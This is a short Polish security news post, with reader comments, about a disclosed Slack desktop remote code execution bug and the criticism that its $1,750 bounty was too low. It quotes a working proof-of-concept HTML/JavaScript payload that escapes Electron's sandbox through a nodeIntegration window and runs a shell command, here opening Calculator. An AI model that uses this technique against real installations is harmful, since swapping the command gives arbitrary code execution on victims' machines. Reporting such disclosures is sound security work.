Preorder drugiego tomu książki sekuraka: Wprowadzenie do bezpieczeństwa IT. -15% z kodem: sekurak-book
Wykonywanie dowolnego kodu w aplikacji desktopowej Slack, bounty: 1750$
Od kilku dni głośno jest o błędzie w Slacku, który umożliwiał wykonanie dowolnego kodu na komputerze, gdzie jedyną interakcją użytkownika było kliknięcie na wiadomość:
<html> <body> <script> // overwrite functions to get a BrowserWindow object: window.desktop.delegate = {} window.desktop.delegate.canOpenURLInWindow = () => true window.desktop.window = {} window.desktop.window.open = () => 1 bw = window.open('about:blank') // leak BrowserWindow class nbw = new bw.constructor({show: false, webPreferences: {nodeIntegration: true}}) // let's make our own with nodeIntegration nbw.loadURL('about:blank') // need to load some URL for interaction nbw.webContents.executeJavaScript('this.require("child_process").exec("open /Applications/Calculator.app")') // exec command </script> </body> </html>
Slack wypłacił bounty w wysokości 1750$, co zostało w społeczności odebrane jako dość niska kwota – a pojawiły się nawet kontrowersyjne wpisy innych firm, mówiące, że za ten sam błąd zapłaciłyby ponad 10000$.
Dokładniej technicznie temu błędowi przyjrzymy się podczas najbliższego BOTW w czwartek o 19:00.
–mb
Albo czegoś nie rozumiem, albo jest błąd w opisie (na hackerone). Badacz podaje, że testował podatność na najwnoszej wersji 4.2 i 4.3, podczas gdy najwnoszą wersją jest 4.9.
O co chodzi?
Może dlatego że zgłoszenie było 4 miesiące temu? (choć disclose dopiero teraz)